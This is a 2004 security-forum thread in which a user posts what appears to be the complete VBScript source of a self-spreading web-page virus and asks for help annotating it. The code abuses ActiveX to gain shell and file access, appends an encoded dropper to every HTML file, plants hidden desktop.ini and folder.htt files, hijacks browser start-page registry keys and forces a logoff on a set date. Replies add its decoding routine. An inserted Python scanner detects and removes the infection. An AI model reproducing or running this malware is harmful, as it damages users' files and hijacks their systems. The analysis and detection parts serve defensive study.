Author: z7 [skyzz], forum user
On Error Resume Next   ' only the key part of the virus; this handles errors so it does not crash
dim AppObj,fso,WsShell,WinDir,TemplateDir,ThisDirPath,TemplateFile,myStartPage,DesktopINI,folderHTT,myEncString,fString,vCode   ' declares a bunch of variables
dim myExpMain(2),myLocalKey(2),iniLine(8),dropMe(4)   ' declares some string arrays
document.write "<"&"div style='visibility: hidden'><"&"applet name='vbs.icarOs.0.0.11' code=com.ms.activeX.ActiveXComponent></"&"applet></"&"div>"   ' & concatenates strings
myData="<"&"script language=""vbscript"" for=""window"" event="""
document.write myData & "onload"">main_onload()</"&"script>"
document.write myData & "onunload"">main_onunload()</"&"script>"

sub main_onload()   ' defines the procedure
  initActiveX()
  initDirPaths()
  initRegEntries()
  initDropCodes()
  checkExistFiles()
  infectThisFile(TemplateFile)
  infectRootDir()
end sub

sub main_onunload()
  infectRootDir()
  checkExistFiles()
  infectThisFile(TemplateFile)
  mergeRegEntries()
  ScanFilesIn(ThisDirPath)
  checkDatePLoad()
end sub

sub initActiveX()   ' adds the statements to the procedure; this looks to me like malicious web-page code
  On Error Resume Next
  Set AppObj = document.applets("vbs.icarOs.0.0.11")
  AppObj.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
  AppObj.createInstance()
  Set WsShell = AppObj.GetObject()
  AppObj.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}")
  AppObj.createInstance()
  Set fso = AppObj.GetObject()
end sub

sub initDirPaths()
  On Error Resume Next
  WinDir = fso.GetSpecialFolder(0)   ' sets WinDir to the returned system (Windows) folder
  TemplateDir = WinDir & "\" & "Web" & "\"   ' makes TemplateDir the \Web\ path under the system folder
  TemplateFile = TemplateDir & "folder.htt"
  ThisDirPath = Mid(window.location, 9, Len(window.location))
  For x = Len(ThisDirPath) To 1 Step -1
    If Mid(ThisDirPath, x, 1) = "/" Then Exit For
  Next   ' a loop; the resulting value of x is used below
  If LCase(Right(ThisDirPath, 3)) = "htm" Or LCase(Right(ThisDirPath, 4)) = "html" Then
    ThisDirPath = Mid(ThisDirPath, 1, x)
  Else
    ThisDirPath = Mid(ThisDirPath, 1, Len(ThisDirPath) + x) & "/"   ' x is used here
    ThisDirPath = unescape(ThisDirPath)
  End If
end sub

sub initRegEntries()   ' modifies the registry to point at the specified web page; probably so it is not killed so easily
  On Error Resume Next
  myLocalKey(0) = "Start Page"
  myLocalKey(1) = "Local Page"
  myLocalKey(2) = "Default_Page_URL"
  myExpMain(0) = "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\"
  myExpMain(1) = "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\"
  myExpMain(2) = "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\"
  myStartPage = "http://www.geocities.com/hedda_marie_tolentino/index.htm"
end sub

sub initDropCodes()   ' writes the desktop.ini file
  On Error Resume Next
  iniLine(0)="[ExtShellFolderViews]"
  iniLine(1)="Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}"
  iniLine(2)="{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}"
  iniLine(3)=""
  iniLine(4)="[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]"
  iniLine(5)="PersistMoniker=file://Folder.htt"
  iniLine(6)=""
  iniLine(7)="[.ShellClassInfo]"
  iniLine(8)="ConfirmFileOp=0"
  for x = 0 to 8
    DesktopINI=DesktopINI & iniLine(x) & vbcrlf   ' vbcrlf is carriage return + line feed
  next
  folderHTT = "<"&"html><"&"body style=""margin: 0"" scroll=no><"&"object id=FileList border=0 tabindex=1 classid=""clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"" style=""width: 100%; height: 100%"" tabIndex=-1></"&"object></"&"body></"&"html>"
  dropMe(0) = "<"&"script language=""vbscript""><"&chr(33)&"--"
  dropMe(1) = "myEncString="""&myEncString&""""
  dropMe(2) = "Exe" & "cute(""for i=1 to Len(myEncString)"" & vbcrlf & ""s=chr(asc(mid(myEncString,i,1))+i mod 2)"" & vbcrlf & ""if s=chr(19) then s=chr(34)"" & vbcrlf & ""if s=chr(28) then s=vbCr"" & vbcrlf & ""if s=chr(29) then s=vbLf"" & vbcrlf & ""myDecString=myDecString & s"" & vbcrlf & ""next"")"
  dropMe(3) = "Exe" & "cute(myDecString)"
  dropMe(4) = "--" & "></" & "script>"
  for x = 0 to 4
    vCode=vCode & dropMe(x) & vbcrlf
  next
  fString=myEncString
end sub   ' writes the htt file

Sub ScanFilesIn(folderspec)   ' scans files; the precondition for spreading to other files
  On Error Resume Next
  Set myFolders2 = fso.GetFolder(folderspec)
  Set mySubFolderFiles = myFolders2.Files
  For Each mySubFolderFile In mySubFolderFiles
    myExt = LCase(fso.GetExtensionName(mySubFolderFile.Name))
    If myExt = "htm" Or myExt = "html" Or myExt = "htt" Then
      infectThisFile (mySubFolderFile.Path)   ' checks for htm and html files: lowercases the last 3 or 4 characters of the name and replaces files ending in htm or html
      If myExt = "htt" Then
        Set myFile = fso.GetFile(mySubFolderFile.Path)
        myFile.Attributes = 7   ' sets the file to read-only, hidden, system
      End If
    End If
  Next
End Sub

Sub infectThisFile(folderspec)
  On Error Resume Next
  Set myFile = fso.OpenTextFile(folderspec)
  myContents = myFile.ReadAll
  myFile.Close
  k=0
  for i= len(myContents) to 1 step -1
    if mid(myContents,i,len(fString))=fString then
      k=k+1
      exit for
    end if
  next
  if k=0 then
    vPCode=myContents & vbcrlf & vCode
    Set myFile = fso.GetFile(folderspec)
    myFile.Attributes = 0
    Set myFile = fso.OpenTextFile(folderspec, 2)
    myFile.Write vPCode
    myFile.Close
  end if
End Sub

sub checkExistFiles()   ' checks whether it has already infected; if not, it infects
  On Error Resume Next
  If not(fso.FolderExists(TemplateDir)) Then Set myFile = fso.CreateFolder(TemplateDir)
  Set myFile = fso.GetFolder(TemplateDir)
  myFile.Attributes = 7
  CreateThisFile TemplateFile,folderHTT
end sub

sub infectRootDir()
  On Error Resume Next
  If Len(unescape(ThisDirPath)) <= 4 Then
    ThisDirPath =Mid(ThisDirPath, 1, 3)
    CreateThisFile ThisDirPath&"folder.htt",folderHTT&vbcrlf&vCode
    CreateThisFile ThisDirPath&"desktop.ini",DesktopINI
  end if
end sub

sub mergeRegEntries()   ' merges the entries into the registry
  On Error Resume Next
  for x=0 to 2
    ApplyRegChangesTo myExpMain(x) & myLocalKey(x), "REG_SZ", myStartPage
  next
end sub

Sub ApplyRegChangesTo(myRegKey, myRegType, myRegValue)
  On Error Resume Next
  WsShell.RegWrite myRegKey, myRegValue, myRegType
End Sub

Sub checkDatePLoad()   ' does a date check; at the specified time it restarts explorer (via rundll32.exe)
  On Error Resume Next
  If Mid(FormatDateTime(Now(), 2), 1, 4) = "9/26" Then WsShell.Run ("RUNDLL32.EXE shell32.dll,SHExitWindowsEx 2")
End Sub

Sub CreateThisFile(folderspec,withContents)
  On Error Resume Next
  set myFile=fso.GetFile(folderspec)
  myFile.Attributes = 0
  Set myFile=fso.CreateTextFile(folderspec, True)
  myFile.Write withContents
  myFile.Close
  set myFile=fso.GetFile(folderspec)
  myFile.Attributes = 7
End Sub

I only started looking at VBS yesterday, so my comments are not clear. Could an expert annotate it? [This post was edited by z7(skyzz) on June 17 at 11:12]
Original poster, posted: 04-06-16 19:57
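The dropper above leaves two file artifacts that a defender can look for: a desktop.ini that forces the folder's web view to Folder.htt (the [ExtShellFolderViews] section with the {5984FFE0-...} CLSID and PersistMoniker=file://Folder.htt) and a VBScript block appended to every .htm/.html/.htt it touches (the <script language="vbscript"><!-- ... --></script> wrapper around myEncString= and the self-decoding loop). The following Python scanner is an added example, not code from the thread or from the virus author: it walks a directory tree, reports both artifacts, and strips the appended block from a web page. The sample tree it builds is constructed from the strings in the post; the encoded payload is a placeholder, not real data.

```python
"""Detect and clean the folder.htt / desktop.ini infection pattern analysed in the thread.
Added example; indicators are taken from the posted source, sample files are constructed."""
import os
import re
import tempfile
from dataclasses import dataclass

# Indicators lifted from the posted virus source.
HIJACK_CLSID = "{5984FFE0-28D4-11CF-AE66-08002B2E1262}"   # shell view CLSID written to desktop.ini
HIJACK_MONIKER = "persistmoniker=file://folder.htt"        # compared against lowercased text
SCRIPT_MARKERS = (                                         # strings present in the appended dropper
    "vbs.icaros.0.0.11",
    "myencstring=",
    "s=chr(asc(mid(myencstring,i,1))+i mod 2)",
)
WEB_EXTS = {".htm", ".html", ".htt"}                       # the extensions ScanFilesIn() infects

# The appended block is exactly dropMe(0)..dropMe(4): a vbscript tag wrapping myEncString=...
# The tempered (?:(?!</script>).) keeps the match inside one script element.
DROPPED_BLOCK_RE = re.compile(
    r'<script language="vbscript"><!--(?:(?!</script>).)*?myEncString=(?:(?!</script>).)*?--></script>\r?\n?',
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Finding:
    path: str
    kind: str        # "shell-folder-hijack" or "appended-dropper"
    evidence: str


def check_desktop_ini(text: str) -> bool:
    """True when desktop.ini redirects the folder web view to Folder.htt via the hijack CLSID."""
    low = text.lower()
    return HIJACK_CLSID.lower() in low and HIJACK_MONIKER in low


def find_script_markers(text: str) -> list:
    """Return the dropper marker strings present in a web file (empty list = clean)."""
    low = text.lower()
    return [m for m in SCRIPT_MARKERS if m in low]


def scan_tree(root: str) -> list:
    """Walk root and report desktop.ini hijacks and web files carrying the appended dropper."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="latin-1", newline="") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name.lower() == "desktop.ini" and check_desktop_ini(text):
                findings.append(Finding(path, "shell-folder-hijack", HIJACK_MONIKER))
            elif os.path.splitext(name)[1].lower() in WEB_EXTS:
                hits = find_script_markers(text)
                if hits:
                    findings.append(Finding(path, "appended-dropper", ", ".join(hits)))
    return findings


def disinfect_web_file(text: str):
    """Remove the appended dropper block(s); returns (cleaned_text, blocks_removed)."""
    return DROPPED_BLOCK_RE.subn("", text)


def build_sample_tree(root: str) -> None:
    """Constructed sample modelled on the posted strings; the payload string is a placeholder."""
    desktop_ini = "\r\n".join([
        "[ExtShellFolderViews]", f"Default={HIJACK_CLSID}", f"{HIJACK_CLSID}={HIJACK_CLSID}", "",
        f"[{HIJACK_CLSID}]", "PersistMoniker=file://Folder.htt", "",
        "[.ShellClassInfo]", "ConfirmFileOp=0",
    ]) + "\r\n"
    dropper = "\r\n".join([
        '<script language="vbscript"><!--',
        'myEncString="PLACEHOLDER_ENCODED_PAYLOAD"',   # constructed, not real virus data
        'Execute("for i=1 to Len(myEncString)" & vbcrlf & "s=chr(asc(mid(myEncString,i,1))+i mod 2)" & vbcrlf & "next")',
        "Execute(myDecString)",
        "--></script>",
    ]) + "\r\n"
    clean_page = "<html><body>Quarterly report</body></html>\r\n"
    os.makedirs(os.path.join(root, "sub"), exist_ok=True)
    samples = {
        "desktop.ini": desktop_ini,
        "folder.htt": "<html><body></body></html>\r\n" + dropper,
        os.path.join("sub", "index.html"): clean_page + dropper,      # infected page
        os.path.join("sub", "about.htm"): clean_page,                 # clean page
        os.path.join("sub", "notes.txt"): "myEncString= in a text file is not a web file\r\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w", newline="") as fh:
            fh.write(content)


def demo() -> dict:
    """Build the sample tree in a temp dir, scan it, and clean the infected page."""
    root = tempfile.mkdtemp(prefix="htt_scan_")
    build_sample_tree(root)
    findings = scan_tree(root)
    kinds = sorted((os.path.relpath(f.path, root).replace(os.sep, "/"), f.kind) for f in findings)
    with open(os.path.join(root, "sub", "index.html"), "r", newline="") as fh:
        cleaned, removed = disinfect_web_file(fh.read())
    return {
        "findings": kinds,
        "removed_blocks": removed,
        "cleaned_is_original": cleaned == "<html><body>Quarterly report</body></html>\r\n",
        "still_flagged": bool(find_script_markers(cleaned)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a live Windows machine the same sweep should also read the three Start Page / Local Page / Default_Page_URL values under the Internet Explorer\Main keys listed in initRegEntries() and compare them with the geocities URL, and should treat folder.htt or desktop.ini files with attributes 7 (read-only + hidden + system) in a drive root or the Windows\Web folder as suspicious even before the content check. The two CLSIDs in initActiveX() resolve to WScript.Shell and Scripting.FileSystemObject, which is how a plain web page obtains registry and file access here.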
Reply: kailangq [kailangq], moderator
...Honestly... I can't understand it... Could someone give a hint or an explanation?
Reply 1, posted: 04-06-17 00:27
Reply: z7 [skyzz], forum user
Attached is the decryption part of the code:

Execute("for i=1 to len(myEncString)" & vbcrlf & "s=chr(asc(mid(myEncString,i,1))+i mod 2)" & vbcrlf & "if s=chr(19) then s=chr(34)" & vbcrlf & "if s=chr(28) then s=vbCr" & vbcrlf & "if s=chr(29) then s=vbLf" & vbcrlf & "myDecString=myDecString & s" & vbcrlf & "next")
Execute(myDecString)

His encryption method isn't very good either.
Reply 2, posted: 04-06-17 11:23
Reply: jacker [jacker], forum user
The comments are already quite good; more detail would be even better.

sub initActiveX()   ' adds the statements to the procedure; this looks to me like malicious web-page code
  On Error Resume Next
  Set AppObj = document.applets("vbs.icarOs.0.0.11")
  AppObj.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
  AppObj.createInstance()
  Set WsShell = AppObj.GetObject()
  AppObj.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}")
  AppObj.createInstance()
  Set fso = AppObj.GetObject()
end sub

These are the relevant class IDs. You can find out which programs they point to by searching the registry.
Reply 3, posted: 04-06-17 17:00
Reply: lijingxi [lijingxi], trainee moderator
Nice! Bumped! But as soon as I open this page, my Norton warns me about a virus!
Reply 4, posted: 04-06-18 14:09
Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
Guangdong ICP licence no. 05087286